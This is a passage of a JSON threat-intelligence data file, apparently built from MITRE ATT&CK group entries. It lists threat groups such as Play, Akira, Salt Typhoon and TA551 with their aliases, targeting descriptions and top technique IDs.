Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1030", "name": "Data Transfer Size Limits"}, {"id": "T1048", "name": "Exfiltration Over Alternative Protocol"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1078", "name": "Valid Accounts"}]}, {"name": "ToddyCat", "attack_id": "G1022", "aliases": ["ToddyCat"], "description": "ToddyCat is a sophisticated threat group that has been active since at least 2020 using custom loaders and malware in multi-stage infection chains against government and military targets across Europe and Asia.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1069.002", "name": "Domain Groups"}, {"id": "T1074.002", "name": "Remote Data Staging"}]}, {"name": "INC Ransom", "attack_id": "G1032", "aliases": ["INC Ransom", "GOLD IONIC"], "description": "INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide most commonly in the industrial, healthcare, and education sectors in the US and Europe.", "top_techniques": [{"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1069.002", "name": "Domain Groups"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1071", "name": "Application Layer Protocol"}, {"id": "T1074", "name": "Data Staged"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1087.002", "name": "Domain Account"}]}, {"name": "Velvet Ant", "attack_id": "G1047", "aliases": ["Velvet Ant"], "description": "Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero day exploits.", "top_techniques": [{"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1037.004", "name": "RC Scripts"}, {"id": "T1040", "name": "Network Sniffing"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1059.004", "name": "Unix Shell"}, {"id": "T1071", "name": "Application Layer Protocol"}, {"id": "T1078.003", "name": "Local Accounts"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1090.001", "name": "Internal Proxy"}]}, {"name": "Inception", "attack_id": "G0100", "aliases": ["Inception", "Inception Framework", "Cloud Atlas"], "description": "Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1069.002", "name": "Domain Groups"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1090.003", "name": "Multi-hop Proxy"}, {"id": "T1102", "name": "Web Service"}, {"id": "T1203", "name": "Exploitation for Client Execution"}]}, {"name": "Blue Mockingbird", "attack_id": "G0108", "aliases": ["Blue Mockingbird"], "description": "Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1112", "name": "Modify Registry"}]}, {"name": "Agrius", "attack_id": "G1030", "aliases": ["Agrius", "Pink Sandstorm", "AMERICIUM", "Agonizing Serpens", "BlackShadow"], "description": "Agrius is an Iranian threat actor active since 2020 notable for a series of ransomware and wiper operations in the Middle East, with an emphasis on Israeli targets. Public reporting has linked Agrius to Iran's Ministry of Intelligence and Security (MOIS).", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1074.001", "name": "Local Data Staging"}, {"id": "T1078.002", "name": "Domain Accounts"}, {"id": "T1110", "name": "Brute Force"}]}, {"name": "APT19", "attack_id": "G0073", "aliases": ["APT19", "Codoso", "C0d0so0", "Codoso Team", "Sunshop Group"], "description": "APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but it is unclear from open source information if the groups are the same.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1112", "name": "Modify Registry"}, {"id": "T1132.001", "name": "Standard Encoding"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1189", "name": "Drive-by Compromise"}]}, {"name": "Lotus Blossom", "attack_id": "G0030", "aliases": ["Lotus Blossom", "DRAGONFISH", "Spring Dragon", "RADIUM", "Raspberry Typhoon", "Bilbug", "Thrip"], "description": "Lotus Blossom is a long-standing threat group largely targeting various entities in Asia since at least 2009. In addition to government and related targets, Lotus Blossom has also targeted entities such as digital certificate issuers.", "top_techniques": [{"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1016.001", "name": "Internet Connection Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1074.001", "name": "Local Data Staging"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1087.001", "name": "Local Account"}, {"id": "T1087.002", "name": "Domain Account"}, {"id": "T1090.001", "name": "Internal Proxy"}]}, {"name": "Star Blizzard", "attack_id": "G1033", "aliases": ["Star Blizzard", "SEABORGIUM", "Callisto Group", "TA446", "COLDRIVER"], "description": "Star Blizzard is a cyber espionage and influence group originating in Russia that has been active since at least 2019. Star Blizzard campaigns align closely with Russian state interests and have included persistent phishing and credential theft against academic, defense, government, NGO, and think tank organizations in NATO countries, particularly the US and the UK.", "top_techniques": [{"id": "T1059.007", "name": "JavaScript"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1114.002", "name": "Remote Email Collection"}, {"id": "T1114.003", "name": "Email Forwarding Rule"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1539", "name": "Steal Web Session Cookie"}, {"id": "T1550.004", "name": "Web Session Cookie"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1583", "name": "Acquire Infrastructure"}, {"id": "T1583.001", "name": "Domains"}, {"id": "T1585.001", "name": "Social Media Accounts"}, {"id": "T1585.002", "name": "Email Accounts"}]}, {"name": "LazyScripter", "attack_id": "G0140", "aliases": ["LazyScripter"], "description": "LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.", "top_techniques": [{"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1071.004", "name": "DNS"}, {"id": "T1102", "name": "Web Service"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.005", "name": "Mshta"}]}, {"name": "Cinnamon Tempest", "attack_id": "G1021", "aliases": ["Cinnamon Tempest", "DEV-0401", "Emperor Dragonfly", "BRONZE STARLIGHT"], "description": "Cinnamon Tempest is a China-based threat group that has been active since at least 2021 deploying multiple strains of ransomware based on the leaked Babuk source code. Cinnamon Tempest does not operate their ransomware on an affiliate model or purchase access but appears to act independently in all stages of the attack lifecycle. Based on victimology, the short lifespan of each ransomware variant, and use of malware attributed to government-sponsored threat groups, Cinnamon Tempest may be motivated by intellectual property theft or cyberespionage rather than financial gain.", "top_techniques": [{"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1078.002", "name": "Domain Accounts"}, {"id": "T1080", "name": "Taint Shared Content"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}]}, {"name": "CURIUM", "attack_id": "G1012", "aliases": ["CURIUM", "Crimson Sandstorm", "TA456", "Tortoise Shell", "Yellow Liderc"], "description": "CURIUM is an Iranian threat group, first reported in September 2019 and active since at least July 2018, targeting IT service providers in the Middle East. CURIUM has since invested in building relationships with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note CURIUM has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1048.002", "name": "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1124", "name": "System Time Discovery"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1505.003", "name": "Web Shell"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.003", "name": "Spearphishing via Service"}, {"id": "T1583.001", "name": "Domains"}]}, {"name": "Windshift", "attack_id": "G0112", "aliases": ["Windshift", "Bahamut"], "description": "Windshift is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.", "top_techniques": [{"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1036.001", "name": "Invalid Code Signature"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.001", "name": "Malicious Link"}]}, {"name": "Confucius", "attack_id": "G0142", "aliases": ["Confucius", "Confucius APT"], "description": "Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.", "top_techniques": [{"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1119", "name": "Automated Collection"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.005", "name": "Mshta"}]}, {"name": "Saint Bear", "attack_id": "G1031", "aliases": ["Saint Bear", "Storm-0587", "TA471", "UAC-0056", "Lorec53"], "description": "Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities. Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1112", "name": "Modify Registry"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1497", "name": "Virtualization/Sandbox Evasion"}, {"id": "T1553.002", "name": "Code Signing"}]}, {"name": "Daggerfly", "attack_id": "G1034", "aliases": ["Daggerfly", "Evasive Panda", "BRONZE HIGHLAND"], "description": "Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.", "top_techniques": [{"id": "T1003.002", "name": "Security Account Manager"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1036.003", "name": "Rename Legitimate Utilities"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1136.001", "name": "Local Account"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1195.002", "name": "Compromise Software Supply Chain"}, {"id": "T1204.001", "name": "Malicious Link"}]}, {"name": "Leafminer", "attack_id": "G0077", "aliases": ["Leafminer", "Raspite"], "description": "Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1003.004", "name": "LSA Secrets"}, {"id": "T1003.005", "name": "Cached Domain Credentials"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1055.013", "name": "Process Doppelgänging"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1110.003", "name": "Password Spraying"}, {"id": "T1114.002", "name": "Remote Email Collection"}, {"id": "T1136.001", "name": "Local Account"}]}, {"name": "Akira", "attack_id": "G1024", "aliases": ["Akira", "GOLD SAHARA", "PUNK SPIDER", "Howling Scorpius"], "description": "Akira is a ransomware variant and ransomware deployment entity active since at least March 2023. Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement. Akira operations are associated with \"double extortion\" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with Conti ransomware.", "top_techniques": [{"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1027.001", "name": "Binary Padding"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1133", "name": "External Remote Services"}, {"id": "T1213.002", "name": "Sharepoint"}, {"id": "T1219", "name": "Remote Access Tools"}, {"id": "T1482", "name": "Domain Trust Discovery"}, {"id": "T1486", "name": "Data Encrypted for Impact"}, {"id": "T1531", "name": "Account Access Removal"}]}, {"name": "BITTER", "attack_id": "G1002", "aliases": ["BITTER", "T-APT-17"], "description": "BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1095", "name": "Non-Application Layer Protocol"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1559.002", "name": "Dynamic Data Exchange"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1568", "name": "Dynamic Resolution"}]}, {"name": "Molerats", "attack_id": "G0021", "aliases": ["Molerats", "Operation Molerats", "Gaza Cybergang"], "description": "Molerats is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.", "top_techniques": [{"id": "T1027.015", "name": "Compression"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.007", "name": "Msiexec"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}]}, {"name": "Stealth Falcon", "attack_id": "G0038", "aliases": ["Stealth Falcon"], "description": "Stealth Falcon is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1012", "name": "Query Registry"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1041", "name": "Exfiltration Over C2 Channel"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1082", "name": "System Information Discovery"}]}, {"name": "Gorgon Group", "attack_id": "G0078", "aliases": ["Gorgon Group"], "description": "Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States.", "top_techniques": [{"id": "T1055.002", "name": "Portable Executable Injection"}, {"id": "T1055.012", "name": "Process Hollowing"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1106", "name": "Native API"}, {"id": "T1112", "name": "Modify Registry"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1547.009", "name": "Shortcut Modification"}]}, {"name": "Axiom", "attack_id": "G0001", "aliases": ["Axiom", "Group 72"], "description": "Axiom is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between Axiom and Winnti Group but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.", "top_techniques": [{"id": "T1001.002", "name": "Steganography"}, {"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1005", "name": "Data from Local System"}, {"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1546.008", "name": "Accessibility Features"}, {"id": "T1553", "name": "Subvert Trust Controls"}, {"id": "T1560", "name": "Archive Collected Data"}, {"id": "T1563.002", "name": "RDP Hijacking"}]}, {"name": "SideCopy", "attack_id": "G1008", "aliases": ["SideCopy"], "description": "SideCopy is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. SideCopy's name comes from its infection chain that tries to mimic that of Sidewinder, a suspected Indian threat group.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1106", "name": "Native API"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.005", "name": "Mshta"}, {"id": "T1518", "name": "Software Discovery"}, {"id": "T1518.001", "name": "Security Software Discovery"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1574.001", "name": "DLL"}]}, {"name": "EXOTIC LILY", "attack_id": "G1011", "aliases": ["EXOTIC LILY"], "description": "EXOTIC LILY is a financially motivated group that has been closely linked with Wizard Spider and the deployment of ransomware including Conti and Diavol. EXOTIC LILY may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.", "top_techniques": [{"id": "T1102", "name": "Web Service"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1566.003", "name": "Spearphishing via Service"}, {"id": "T1583.001", "name": "Domains"}, {"id": "T1585.001", "name": "Social Media Accounts"}, {"id": "T1585.002", "name": "Email Accounts"}, {"id": "T1589.002", "name": "Email Addresses"}, {"id": "T1593.001", "name": "Social Media"}]}, {"name": "BackdoorDiplomacy", "attack_id": "G0135", "aliases": ["BackdoorDiplomacy"], "description": "BackdoorDiplomacy is a cyber espionage threat group that has been active since at least 2017. BackdoorDiplomacy has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.", "top_techniques": [{"id": "T1027", "name": "Obfuscated Files or Information"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1074.001", "name": "Local Data Staging"}, {"id": "T1095", "name": "Non-Application Layer Protocol"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1120", "name": "Peripheral Device Discovery"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1505.003", "name": "Web Shell"}]}, {"name": "Tonto Team", "attack_id": "G0131", "aliases": ["Tonto Team", "Earth Akhlut", "BRONZE HUNTLEY", "CactusPete", "Karma Panda"], "description": "Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1069.001", "name": "Local Groups"}, {"id": "T1090.002", "name": "External Proxy"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1135", "name": "Network Share Discovery"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1210", "name": "Exploitation of Remote Services"}]}, {"name": "BlackTech", "attack_id": "G0098", "aliases": ["BlackTech", "Palmerworm"], "description": "BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.", "top_techniques": [{"id": "T1021.004", "name": "SSH"}, {"id": "T1036.002", "name": "Right-to-Left Override"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1106", "name": "Native API"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1574.001", "name": "DLL"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Transparent Tribe", "attack_id": "G0134", "aliases": ["Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM"], "description": "Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1564.001", "name": "Hidden Files and Directories"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1568", "name": "Dynamic Resolution"}, {"id": "T1583.001", "name": "Domains"}]}, {"name": "Salt Typhoon", "attack_id": "G1045", "aliases": ["Salt Typhoon"], "description": "Salt Typhoon is a People's Republic of China (PRC) state-backed actor that has been active since at least 2019 and responsible for numerous compromises of network infrastructure at major U.S. telecommunication and internet service providers (ISP).", "top_techniques": [{"id": "T1021.004", "name": "SSH"}, {"id": "T1040", "name": "Network Sniffing"}, {"id": "T1048.003", "name": "Exfiltration Over Unencrypted Non-C2 Protocol"}, {"id": "T1098.004", "name": "SSH Authorized Keys"}, {"id": "T1110.002", "name": "Password Cracking"}, {"id": "T1136", "name": "Create Account"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1572", "name": "Protocol Tunneling"}, {"id": "T1587.001", "name": "Malware"}, {"id": "T1588.002", "name": "Tool"}, {"id": "T1590.004", "name": "Network Topology"}, {"id": "T1602.002", "name": "Network Device Configuration Dump"}]}, {"name": "TA551", "attack_id": "G0127", "aliases": ["TA551", "GOLD CABIN", "Shathak"], "description": "TA551 is a financially-motivated threat group that has been active since at least 2018. The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns.", "top_techniques": [{"id": "T1027.003", "name": "Steganography"}, {"id": "T1027.010", "name": "Command Obfuscation"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1132.001", "name": "Standard Encoding"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.005", "name": "Mshta"}, {"id": "T1218.010", "name": "Regsvr32"}, {"id": "T1218.011", "name": "Rundll32"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Naikon", 